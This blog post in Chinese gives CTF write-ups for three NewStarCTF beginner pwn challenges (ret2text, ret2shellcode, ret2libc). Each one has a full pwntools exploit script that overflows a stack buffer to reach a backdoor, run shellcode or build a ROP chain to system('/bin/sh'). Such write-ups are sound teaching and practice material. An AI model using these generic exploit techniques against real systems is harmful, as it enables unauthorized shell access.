NewStarCTF公开赛赛道 Pwn Writeups

ret2text

检查文件

$ checksec pwn
[*] '/home/zhailin/365-Days-Get-ISCAS-Internship/week1/[NewStarCTF 公开赛赛道]/ret2text/pwn'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

IDA中找到后门函数

图1展示在IDA中找到后门函数

计算偏移量

图2展示在GDB中通过调试计算偏移量

Exp

from pwn import *

# sh = process('pwn')
sh = remote('host',port)

backdoor_addr = 0x0400708 

payload = b'a'*40 + p64(backdoor_addr)

sh.sendline(payload)
sh.interactive()

ret2shellcode

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char v4[40]; // [rsp+0h] [rbp-30h] BYREF
  void *buf; // [rsp+28h] [rbp-8h]

  init(argc, argv, envp);
  buf = mmap((void *)0x233000, 0x1000uLL, 7, 34, -1, 0LL);
  puts("Hello my friend.Any gift for me?");
  read(0, buf, 0x100uLL);
  puts("Anything else?");
  read(0, v4, 0x100uLL);
  puts("Ok.See you!");
  return 0;
}

图3展示在GDB中通过调试确定偏移量

接下来找到有一片有可读可写可执行的内存区域

图3展示在GDB中通过调试找到可用的有可读可写可执行的内存区域

Exp

from pwn import*

context(log_level = 'debug', arch = 'amd64', os = 'linux')
shellcode=asm(shellcraft.sh())

p=remote('host',port)
p.recvuntil('me?')

payload=shellcode
p.sendline(payload)

p.recvuntil('else?')

payload=b'a'*0x38+p64(0x233000)

p.sendline(payload)
p.interactive()

ret2libc

gadget然后老方法确定地址,加上x64栈对齐

Exp

from pwn import *
from LibcSearcher import *

context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('host',port)
elf = ELF('./pwn')
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
main_addr = 0x0400698
pop_rdi = 0x400753
ret_addr = 0x40050e

payload1 = b'a'*40 + p64(pop_rdi) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(main_addr)

io.sendlineafter('Glad to meet you again!What u bring to me this time?',payload1)
puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc = ELF('./libc-2.31.so')

libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + next(libc.search('/bin/sh'))


payload2 = b'a'*40 + p64(pop_rdi) + p64(bin_sh_addr) + p64(ret_addr) + p64(system_addr) 
io.sendline(payload2)
io.interactive()
Pwn
#CTF #Pwn
NewStarCTF公开赛赛道 Pwn Writeups
https://zer0ptr.github.io/2025/10/07/NewStar-CTF-public-wps/
Author
hakmaple
Posted on
October 7, 2025
Licensed under